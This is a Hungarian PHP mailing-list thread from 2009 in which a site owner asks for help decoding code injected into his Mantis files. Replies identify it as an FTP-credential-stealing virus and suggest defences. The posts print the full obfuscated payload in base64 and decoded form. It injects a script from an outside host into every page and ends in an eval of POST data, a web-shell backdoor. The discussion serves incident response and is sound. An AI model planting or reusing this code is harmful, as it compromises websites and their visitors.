Zgoj, mi ez???

--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Szia,

Minden bizonnyal csak a "jól ismert" FTP vírus egyik variánsa.
részletesen: http://blog.webpozitiv.hu/bejelentett-tamado-webhely-mit-tegyek/

üdv!
Előd

Vasóczki Ferenc írta:

Sziasztok!

 

A segítségeteket szeretném kérni.

Hajnali 3 órakor a Mantisomban megváltozott néhány fájl.

 

Bekerült egy sor a fontosabb fájlok elejére, nem csak az index.php –be, hanem config fájlokba is.

Ezt akarta eval() –ozni:

 

base64_decode('aWYoIWlzc2V0KCR6Z29qMSkpe2Z1bmN0aW9uIHpnb2ooJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzTm9hVzUzYjI5eWFT NTBiM1Z5YzJ0dmNtVmhMbU52YlM5dVpYZEZkbVZ1ZEM5VWFXMWhaMlZ6TDJ4bFpuUmZaWFpsYc3RzKCR6Z29qMSkpY2FsbF91c2VyX2Z1bmMoJHpnb2oxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3pnb2onKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnemdvaicpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSR6Z29qbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignemdvajInKSkhPSd6Z29qMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7');

 

Csináltam egy

<?

$a= base64_decode(…);

echo $a;

?>

 

kódot, és megnéztem a forrást.

 

 

nt.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3NoaW53b29yaS50b3Vyc2tvcmVhLmNvbS9uZXdFdmVudC9UaW1hZ2VzL2xlZnRfZXZlbnRfbWFpbi5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function zgoj2($a,$b,$c,$d){global $zgoj1;$s=array();if(function_exists($zgoj1))call_user_func($zgoj1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='zgoj')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=c

Segítene nekem valaki értelmezni ezt?

 

Vasó

--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Szerintem keresd meg, hogy hol tortek be a gepedre, valszeg valami php
sebezhetosegen keresztul...
--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Hmm :)

az biztos, hogy iframe a lenti linkre, de megnézem, hogy a kód többi
része mit rafináltkodik.

h t t p : / / s h i n w o o r i . t o u r s k o r e a . c o m / n e w E
v e n t / T i m a g e s / l e f t _ e v e n t _ m a i n . p h p

értelemszerűen szóközöket törölni kell, ha van aki elég bátor ;)

zsolt

Vasóczki Ferenc wrote:
--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_qu
> ote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcm
> lwdCBzcmM9aHR0cDovL3NoaW53b29yaS50b3Vyc2tvcmVhLmNvbS9uZXdFdmVudC9UaW1hZ2VzL2
> xlZnRfZXZlbnRfbWFpbi5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$

> Nem vagyok valami nagy guru, úgyhogy én ezt egyedül biztosan nem fogom tudni
> visszafejteni.
>
> Segítene nekem valaki értelmezni ezt?
>

van benne (fent) megegy base64 cucc, ami imho a lenyege
az egesznek, egy site aminek egy scriptjet beilleszti iframe-el.

udv!

--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Keressük, hogyan jöttek be, de a total commandert száműztem az életemből.
Így jár aki lusta felvenni újra az 50+ kapcsolódását :(

Vasó

-----Original Message-----
From: wl-phplista-bounces@...
[mailto:wl-phplista-bounces@...] On Behalf Of Hofferek Attila
Sent: Wednesday, October 21, 2009 3:39 PM
To: weblabor PHP levlista
Subject: Re: [wl-phplista] Zgoj, mi ez???

Szerintem keresd meg, hogy hol tortek be a gepedre, valszeg valami php
sebezhetosegen keresztul...
--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Valami feltétel szerint (gyak mindegy micsoda) néha beilleszti az itt
található JS-t:
hXXp://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php

Edgar
--
www   : http://edgarpe.hu
e-mail: kapcsolat@...

"The only limits are, as always, those of vision." - James Broughton

VF> Sziasztok!
VF>  
VF> A segítségeteket szeretném kérni.
VF> Hajnali 3 órakor a Mantisomban megváltozott néhány fájl.
VF>  
VF> Bekerült egy sor a fontosabb fájlok elejére, nem csak az
VF> index.php –be, hanem config fájlokba is.
VF> Ezt akarta eval() –ozni:
VF>  
VF> base64_decode('aWYoIWlzc2V0KCR6Z29qMSkpe2Z1bmN0aW9uIHpnb2ooJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzTm9hVzUzYjI5eWFTNTBiM1Z5YzJ0dmNtVmhMbU52YlM5dVpYZEZkbVZ1ZEM5VWFXMWhaMlZ6TDJ4bFpuUmZaWFpsYm5SZmJXRnBiaTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIHpnb2oyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHpnb2oxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR6Z29qMSkpY2FsbF91c2VyX2Z1bmMoJHpnb2oxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3pnb2onKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnemdvaicpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSR6Z29qbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignemdvajInKSkhPSd6Z29qMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7');
VF>  
VF> Csináltam egy
VF> <?
VF> $a= base64_decode(…);
VF> echo $a;
?>>
VF>  
VF> kódot, és megnéztem a forrást.
VF>  
VF>  
VF>  
VF> if(!isset($zgoj1)){function
VF> zgoj($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]
VF> as
VF> $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe
VF> ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as
VF> $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'">
VF> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3NoaW53b29yaS50b3Vyc2tvcmVhLmNvbS9uZXdFdmVudC9UaW1hZ2VzL2xlZnRfZXZlbnRfbWFpbi5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return
VF> $s;}function zgoj2($a,$b,$c,$d){global
VF> $zgoj1;$s=array();if(function_exists($zgoj1))call_user_func($zgoj1,$a,$b,$c,$d);foreach(@ob_get_status(1)
VF> as
VF> $v)if(($a=$v['name'])=='zgoj')return;elseif($a=='ob_gzhandler')break;else
VF> $s[]=array($a=='default output
VF> handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('zgoj');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo
VF> $s[$i][1];}}}$zgojl=(($a=@set_error_handler('zgoj2'))!='zgoj2')?$a:0;eval(base64_decode($_POST['e']));
VF>  
VF> Nem vagyok valami nagy guru, úgyhogy én ezt egyedül biztosan nem fogom tudni visszafejteni.
VF> Segítene nekem valaki értelmezni ezt?
VF>  
VF> Vasó


--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

FYI: A TC 7.50+-nál már meg lehet adni mesterjelszót, amit nem tárol el
sehol, viszont titkosítja vele a megadott jelszavaidat.

zsolt

Vasóczki Ferenc wrote: --
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Másik Total Commander rafinéria:
Máshova teszed a fájlokat, és a parancsikon a lent megadott
paraméterekkel (értelemszerűen saját útvonalakkal) indítsa a TC-t.
*
***C:\totalcmd\TOTALCMD.EXE  /i=D:/DOCS/wincmd.ini /f=D:/DOCS/wcx_ftp.ini

Vasóczki Ferenc wrote:
> Keressük, hogyan jöttek be, de a total commandert száműztem az életemből.
> Így jár aki lusta felvenni újra az 50+ kapcsolódását :(
>
> Vasó
>  
--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Hali,

Vasóczki Ferenc wrote:
> Keressük, hogyan jöttek be, de a total commandert száműztem az életemből.
> Így jár aki lusta felvenni újra az 50+ kapcsolódását :(
>  
nem hiszem, hogy ebben az esetben a Total Commander volt a hunyó,
lehetne bármilyen program.
A gond, hogy valaki olyan kapott virust a gépére, akinek megvoltak a
hozzáférései, és a vírust sem vette észre.
Ha átállsz xyz ftp progira, ugyan úgy megtörténhet a fenti eset.
Ráadásul a tc-t is meg kell tanulni használni, főleg olyan valakinek
akinek név:jelszó párosai vannak eltárolva.

C.
--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

CoL wrote:

Hali,

Vasóczki Ferenc wrote:
  

Keressük, hogyan jöttek be, de a total commandert száműztem az életemből.
Így jár aki lusta felvenni újra az 50+ kapcsolódását :(
  
    

nem hiszem, hogy ebben az esetben a Total Commander volt a hunyó, 
lehetne bármilyen program.
A gond, hogy valaki olyan kapott virust a gépére, akinek megvoltak a 
hozzáférései, és a vírust sem vette észre.
Ha átállsz xyz ftp progira, ugyan úgy megtörténhet a fenti eset. 
Ráadásul a tc-t is meg kell tanulni használni, főleg olyan valakinek 
akinek név:jelszó párosai vannak eltárolva.

C.
  

Sőt van olyan variáns ami már a hálózatot sniffeli, így tök mindegy milyen ftp kliens és hogy lemented-e a jelszavad.

dragon

--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

Hali,

dragon wrote:
> Sőt van olyan variáns ami már a hálózatot sniffeli, így tök mindegy
> milyen ftp kliens és hogy lemented-e a jelszavad.
>
ez már egy másik kérdés. Itt nem csak az ftp accal lesz probléma. De
nyilván ftp helyett is érdemes, sftp-t, vagy ssh-t (esetleg kulcs-al)
használni, mert a halózati forgalmat sok helyen sniffelik, nem csak
vírusok :)

C.
--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak

> h t t p : / / s h i n w o o r i . t o u r s k o r e a . c o m / n e w E
> v e n t / T i m a g e s / l e f t _ e v e n t _ m a i n . p h p
>
> értelemszerűen szóközöket törölni kell, ha van aki elég bátor ;)
>

Connecting to shinwoori.tourskorea.com[222.231.24.175]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
18:34:39 ERROR 404: Not Found.

tul nagy batorsag nem kell hozza :)
--
Weblabor hírlevél: http://weblabor.hu/hirlevel
--
wl-phplista (wl-phplista@...) levelezőlista
https://bors.hoszting.com/mailman/listinfo/wl-phplista
Keresheto archivum: http://weblabor.hu/kereses
--
etikett: http://weblabor.hu/levlistak/illemszabaly
offlista: https://weblabor.hu/levlistak